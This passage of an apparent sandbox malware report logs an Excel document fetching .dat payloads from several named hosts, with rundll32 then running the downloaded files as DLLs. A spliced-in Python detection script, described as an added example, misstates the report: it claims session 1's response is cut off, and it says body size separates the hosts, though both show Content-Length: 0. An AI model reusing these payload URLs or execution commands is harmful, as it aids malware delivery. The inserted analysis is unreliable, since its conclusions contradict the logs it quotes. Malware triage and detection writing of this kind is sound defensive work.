Feb 23, 2021 14:25:47.697901011 CET | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:47.757951975 CET | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:49.008389950 CET | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:49.067048073 CET | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:49.500225067 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:49.563935041 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:49.968599081 CET | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:50.017833948 CET | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:50.516366005 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:50.578011036 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:51.530107975 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:51.590218067 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:52.664776087 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:52.865950108 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:52.880219936 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:52.931766987 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:53.498677969 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:53.545864105 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:53.607526064 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:53.696513891 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:54.131462097 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:54.180557013 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:54.586744070 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:54.891293049 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:55.344700098 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:55.404779911 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:56.220449924 CET | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:56.278127909 CET | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:57.660541058 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:57.720671892 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:57.734325886 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:57.783886909 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:57.804344893 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:57.858009100 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:25:58.767709970 CET | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:25:58.818391085 CET | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:00.426373005 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:00.475431919 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:01.229185104 CET | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:01.280988932 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:06.376871109 CET | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:06.425924063 CET | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:10.043467045 CET | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:10.092130899 CET | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:20.651405096 CET | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:20.703030109 CET | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:21.851123095 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:21.904052973 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:23.201653004 CET | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:23.253521919 CET | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:24.495584965 CET | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:24.544322014 CET | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:25.387270927 CET | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:25.435830116 CET | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:26.181955099 CET | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:26.231391907 CET | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:31.689260006 CET | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:31.739661932 CET | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:32.445811987 CET | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:32.538589954 CET | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:33.030227900 CET | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:33.091103077 CET | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:33.660463095 CET | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:33.710828066 CET | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:34.139489889 CET | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:34.211030006 CET | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:34.353008986 CET | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:34.401853085 CET | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:35.403145075 CET | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:35.486800909 CET | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:37.610733032 CET | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:37.667984962 CET | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:38.207225084 CET | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:38.264324903 CET | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:39.008949041 CET | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:39.066279888 CET | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:39.966912031 CET | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:40.024174929 CET | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:40.486193895 CET | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:40.549102068 CET | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:26:49.305099010 CET | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:26:49.363445997 CET | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:27:19.136259079 CET | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:27:19.185045958 CET | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Feb 23, 2021 14:27:20.369985104 CET | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Feb 23, 2021 14:27:20.442787886 CET | 53 | 64206 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 14:25:52.664776087 CET | 192.168.2.4 | 8.8.8.8 | 0x838b | Standard query (0) | rzminc.com | A (IP address) | IN (0x0001)
Feb 23, 2021 14:25:53.498677969 CET | 192.168.2.4 | 8.8.8.8 | 0x50ec | Standard query (0) | pathinanchilearthmovers.com | A (IP address) | IN (0x0001)
Feb 23, 2021 14:25:54.586744070 CET | 192.168.2.4 | 8.8.8.8 | 0x46df | Standard query (0) | jugueterialatorre.com.ar | A (IP address) | IN (0x0001)
Feb 23, 2021 14:25:57.734325886 CET | 192.168.2.4 | 8.8.8.8 | 0x8b5a | Standard query (0) | crt.sectigo.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 14:25:52.865950108 CET | 8.8.8.8 | 192.168.2.4 | 0x838b | No error (0) | rzminc.com | - | 72.52.227.180 | A (IP address) | IN (0x0001)
Feb 23, 2021 14:25:53.696513891 CET | 8.8.8.8 | 192.168.2.4 | 0x50ec | No error (0) | pathinanchilearthmovers.com | - | 162.241.80.6 | A (IP address) | IN (0x0001)
Feb 23, 2021 14:25:54.891293049 CET | 8.8.8.8 | 192.168.2.4 | 0x46df | No error (0) | jugueterialatorre.com.ar | - | 138.36.237.100 | A (IP address) | IN (0x0001)
Feb 23, 2021 14:25:57.783886909 CET | 8.8.8.8 | 192.168.2.4 | 0x8b5a | No error (0) | crt.sectigo.com | - | 91.199.212.52 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• rzminc.com
• pathinanchilearthmovers.com
• jugueterialatorre.com.ar
• crt.sectigo.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49730 | 72.52.227.180 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 14:25:53.024821997 CET | 2534 | OUT | GET /xklyulyijvn/44250601302777800000.dat HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: rzminc.com
Connection: Keep-Alive
Feb 23, 2021 14:25:53.485604048 CET | 2589 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 13:25:53 GMT
Server: Apache/2.4.46 (CentOS)
X-Powered-By: PHP/7.3.27
Upgrade: h2
Connection: keep-alive, close
Cache-Control: private, must-revalidate
Expires: Tue, 23 Feb 2021 13:25:53 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8


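The HTTP sessions above are what a triager would turn into a detection: an Office process issuing a GET for a .dat resource with the default WinINet/urlmon User-Agent (the "MSIE 7.0 ... Trident/7.0" string that non-browser callers such as URLDownloadToFile send), where the Host header resolves to the destination IP in the DNS Answers table, and where the first host replied 200 OK with Content-Length: 0, i.e. an empty body. The script below is an added example and is not part of the Joe Sandbox report; it re-types sessions 0 and 1 and the DNS answers as inline sample data (the record layout is my own assumption, not a sandbox export format), and WINWORD.EXE, POWERPNT.EXE and the .dll/.exe extensions are assumed extra cases beyond what this sample shows.

```python
"""Flag Office-spawned downloader traffic in an HTTP/DNS trace (added example)."""
import re
from urllib.parse import urlsplit

# Default WinINet/urlmon User-Agent sent by non-browser callers (e.g. URLDownloadToFile).
LEGACY_UA = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 7\.0; Windows NT \S+;.*Trident/7\.0")
OFFICE_PROCESSES = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}  # WINWORD/POWERPNT: assumed
PAYLOAD_EXTENSIONS = (".dat", ".dll", ".exe")  # .dat is from this sample; the rest are assumed

# Constructed from the "DNS Answers" table in the report.
DNS_ANSWERS = {
    "rzminc.com": "72.52.227.180",
    "pathinanchilearthmovers.com": "162.241.80.6",
    "jugueterialatorre.com.ar": "138.36.237.100",
    "crt.sectigo.com": "91.199.212.52",
}

UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
      ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")

# Constructed from HTTP sessions 0 and 1 in the report. Session 1's response is cut
# off on the page, so only its status line and Date header are reproduced here.
SESSIONS = [
    {
        "id": 0,
        "process": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
        "dst_ip": "72.52.227.180",
        "request": "GET /xklyulyijvn/44250601302777800000.dat HTTP/1.1\r\n"
                   "Accept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
                   f"User-Agent: {UA}\r\nHost: rzminc.com\r\nConnection: Keep-Alive\r\n",
        "response": "HTTP/1.1 200 OK\r\nDate: Tue, 23 Feb 2021 13:25:53 GMT\r\n"
                    "Server: Apache/2.4.46 (CentOS)\r\nContent-Length: 0\r\n"
                    "Content-Type: text/html; charset=UTF-8\r\n",
    },
    {
        "id": 1,
        "process": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
        "dst_ip": "162.241.80.6",
        "request": "GET /eznwcdhx/44250601302777800000.dat HTTP/1.1\r\n"
                   "Accept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
                   f"User-Agent: {UA}\r\nHost: pathinanchilearthmovers.com\r\n"
                   "Connection: Keep-Alive\r\n",
        "response": "HTTP/1.1 200 OK\r\nDate: Tue, 23 Feb 2021 13:25:53 GMT\r\n",
    },
]


def parse_message(raw):
    """Split an HTTP request or response into (start line, {lowercased header: value})."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def analyze_session(session, dns_answers):
    """Return the per-session indicators and an overall flag."""
    req_line, req = parse_message(session["request"])
    resp_line, resp = parse_message(session["response"])
    _method, target, _version = req_line.split(" ", 2)
    path = urlsplit(target).path.lower()
    host = req.get("host", "")
    status = int(resp_line.split(" ")[1]) if resp_line.startswith("HTTP/") else None
    length = resp.get("content-length")
    findings = {
        "id": session["id"],
        "office_process": session["process"].rsplit("\\", 1)[-1].upper() in OFFICE_PROCESSES,
        "legacy_ua": bool(LEGACY_UA.match(req.get("user-agent", ""))),
        "payload_ext": path.endswith(PAYLOAD_EXTENSIONS),
        # The Host header should resolve (per the DNS answers) to the IP actually contacted.
        "host_matches_dns": dns_answers.get(host) == session["dst_ip"],
        "status": status,
        # 200 OK with Content-Length: 0 means the stager host handed back nothing usable.
        "empty_body": length == "0",
        "body_size_known": length is not None,
    }
    findings["flag"] = (findings["office_process"] and findings["legacy_ua"]
                        and findings["payload_ext"])
    return findings


def analyze_all(sessions=SESSIONS, dns_answers=DNS_ANSWERS):
    """Run the rule over every session and return the findings list."""
    return [analyze_session(s, dns_answers) for s in sessions]


if __name__ == "__main__":
    for finding in analyze_all():
        print(finding)
```

Both sessions trip the rule; the difference between them is the body-size indicator, which separates the dead first host (200 with an empty body) from a host that may actually have served the payload.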
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49732 | 162.241.80.6 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 14:25:53.866291046 CET | 2951 | OUT |
    GET /eznwcdhx/44250601302777800000.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: pathinanchilearthmovers.com
    Connection: Keep-Alive
Feb 23, 2021 14:25:54.569462061 CET | 3145 | IN |
    HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 13:25:53 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Cache-Control: max-age=300
    Expires: Tue, 23 Feb 2021 13:30:53 GMT
    X-Endurance-Cache-Level: 2
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49734 | 138.36.237.100 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 14:25:55.179770947 CET | 3152 | OUT |
    GET /xjzpfwc/44250601302777800000.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: jugueterialatorre.com.ar
    Connection: Keep-Alive
Feb 23, 2021 14:25:56.756165028 CET | 3172 | IN |
    HTTP/1.1 301 Moved Permanently
    Date: Tue, 23 Feb 2021 13:25:55 GMT
    Server: Apache
    X-Powered-By: PHP/7.3.20
    Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=aeb533e0c294d8bd86e1094b2dd7b492; path=/; secure; HttpOnly
    Expires: Wed, 17 Aug 2005 00:00:00 GMT
    Last-Modified: Tue, 23 Feb 2021 13:25:56 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: https://jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=utf-8
Feb 23, 2021 14:25:56.756186962 CET | 3172 | IN |
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49738 | 91.199.212.52 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 14:25:57.848548889 CET | 3185 | OUT |
    GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: crt.sectigo.com
Feb 23, 2021 14:25:57.911541939 CET | 3187 | IN |
    HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 23 Feb 2021 13:25:57 GMT
    Content-Type: application/pkix-cert
    Content-Length: 1559
    Connection: keep-alive
    Last-Modified: Fri, 02 Nov 2018 00:00:00 GMT
    ETag: "5bdb9380-617"
    X-CCACDN-Mirror-ID: sscrl1
    Cache-Control: max-age=14400, s-maxage=3600
    X-CCACDN-Proxy-ID: mcdpinlb5
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Data Raw: 30 82 06 13 30 82 03 fb a0 03 02 01 02 02 10 7d 5b 51 26 b4 76 ba 11 db 74 16 0b bc 53 0d a7 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 88 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 4e 65 77 20 4a 65 72 73 65 79 31 14 30 12 06 03 55 04 07 13 0b 4a 65 72 73 65 79 20 43 69 74 79 31 1e 30 1c 06 03 55 04 0a 13 15 54 68 65 20 55 53 45 52 54 52 55 53 54 20 4e 65 74 77 6f 72 6b 31 2e 30 2c 06 03 55 04 03 13 25 55 53 45 52 54 72 75 73 74 20 52 53 41 20 43 65 72 74 69 66 69 63 61 74 69 6f 6e 20 41 75 74 68 6f 72 69 74 79 30 1e 17 0d 31 38 31 31 30 32 30 30 30 30 30 30 5a 17 0d 33 30 31 32 33 31 32 33 35 39 35 39 5a 30 81 8f 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 18 30 16 06 03 55 04 0a 13 0f 53 65 63 74 69 67 6f 20 4c 69 6d 69 74 65 64 31 37 30 35 06 03 55 04 03 13 2e 53 65 63 74 69 67 6f 20 52 53 41 20 44 6f 6d 61 69 6e 20 56 61 6c 69 64 61 74 69 6f 6e 20 53 65 63 75 72 65 20 53 65 72 76 65 72 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 d6 73 33 d6 d7 3c 20 d0 00 d2 17 45 b8 d6 3e 07 a2 3f c7 41 ee 32 30 c9 b0 6c fd f4 9f cb 12 98 0f 2d 3f 8d 4d 01 0c 82 0f 17 7f 62 2e e9 b8 48 79 fb 16 83 4e ad d7 32 25 93 b7 07 bf b9 50 3f a9 4c c3 40 2a e9 39 ff d9 81 ca 1f 16 32 41 da 80 26 b9 23 7a 87 20 1e e3 ff 20 9a 3c 95 44 6f 87 75 06 90 40 b4 32 93 16 09 10 08 23 3e d2 dd 87 0f 6f 5d 51 14 6a 0a 69 c5 4f 01 72 69 cf d3 93 4c 6d 04 a0 a3 1b 82 7e b1 9a b9 ed c5 9e c5 37 78 9f 9a 08 34 fb 56 2e 58 c4 09 0e 06 64 5b bc 37 dc f1 9f 28 68 a8 56 b0 92 a3 5c 9f bb 88 98 08 1b 24 1d ab 30 85 ae af b0 2e 9e 7a 9d c1 c0 42 1c e2 02 f0 ea e0 4a d2 ef 90 0e b4 c1 40 16 f0 6f 85 42 4a 64 f7 a4 30 a0 fe bf 2e a3 27 5a 8e 8b 58 b8 ad c3 19 17 84 63 ed 6f 56 fd 83 cb 60 34 c4 74 be e6 9d db e1 e4 e5 ca 0c 5f 15 02 03 01 00 01 a3 82 01 6e 30 82 01 6a 30 1f 06 03 55 1d 23 04 18 30 16 80 14 53 79 bf 5a aa 2b 4a cf 54 80 e1 d8 9b c0 9d f2 b2 03 66 cb 30 1d 06 03 55 1d 0e 04 16 04 14 8d 8c 5e c4 54 ad 8a e1 77 e9 9b f9 9b 05 e1 b8 01 8d 61 e1 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 12 06 03 55 1d 13 01 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d 25 04 16 30 14 06 08 2b 06 01 05 05 07 03 01 06 08 2b 06 01 05 05 07 03 02 30 1b 06 03 55 1d 20 04 14 30 12 30 06 06 04 55 1d 20 00 30 08 06 06 67 81 0c 01 02 01 30 50 06 03 55 1d 1f 04 49 30 47 30 45 a0 43 a0 41 86 3f 68 74 74 70 3a 2f 2f 63 72 6c 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f 55 53 45 52 54 72 75 73 74 52 53 41 43 65 72 74 69 66 69 63 61 74 69 6f 6e 41 75 74 68 6f 72 69 74 79 2e 63 72 6c 30 76 06 08 2b 06 01 05 05 07 01 01 04 6a 30 68 30
    Data Ascii: 00}[Q&vtS0*H010UUS10UNew Jersey10UJersey City10UThe USERTRUST Network1.0,U%USERTrust RSA Certification Authority0181102000000Z301231235959Z010UGB10UGreater Manchester10USalford10USectigo Limited1705U.Sectigo RSA Domain Validation Secure Server CA0"0*H0s3< E>?A20l-?Mb.HyN2%P?L@*92A&#z <Dou@2#>o]QjiOriLm~7x4V.Xd[7(hV\$0.zBJ@oBJd0.'ZXcoV`4t_n0j0U#0SyZ+JTf0U^Twa0U0U00U%0++0U 00U 0g0PUI0G0ECA?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v+j0h0
Feb 23, 2021 14:25:57.911576986 CET | 3187 | IN |
    Data Raw: 3f 06 08 2b 06 01 05 05 07 30 02 86 33 68 74 74 70 3a 2f 2f 63 72 74 2e 75 73 65 72 74 72 75 73 74 2e 63 6f 6d 2f 55 53 45 52 54 72 75 73 74 52 53 41 41 64 64 54 72 75 73 74 43 41 2e 63 72 74 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70
    Data Ascii: ?+03http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%+0http://ocsp.usertrust.com0*H2aHOGMxopR13WR1kT@h|U69QF~I*6h9zNVo{;w8_~FHh


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49743 | 72.52.227.180 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 14:26:02.659064054 CET | 3253 | OUT |
    GET /fdzgprclatqo/44250601302777800000.dat HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: rzminc.com
    Connection: Keep-Alive
Feb 23, 2021 14:26:03.122876883 CET | 3282 | IN |
    HTTP/1.1 200 OK
    Date: Tue, 23 Feb 2021 13:26:02 GMT
    Server: Apache/2.4.46 (CentOS)
    X-Powered-By: PHP/7.3.27
    Upgrade: h2
    Connection: keep-alive, close
    Cache-Control: private, must-revalidate
    Expires: Tue, 23 Feb 2021 13:26:02 GMT
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8


HTTPS Packets

Timestamp: Feb 23, 2021 14:25:57.339196920 CET
Source IP: 138.36.237.100    Source Port: 443
Dest IP: 192.168.2.4    Dest Port: 49737
Subject: CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer: CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before: Tue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017
Not After: Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

Subject: CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Not Before: Mon Nov 06 13:23:33 CET 2017
Not After: Sat Nov 06 13:23:33 CET 2027

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 14:25:47
Start date: 23/02/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x9e0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:03
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\JDFR.hdfgr,DllRegisterServer
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:03
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:04
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:26:04
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Imagebase: 0x1310000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

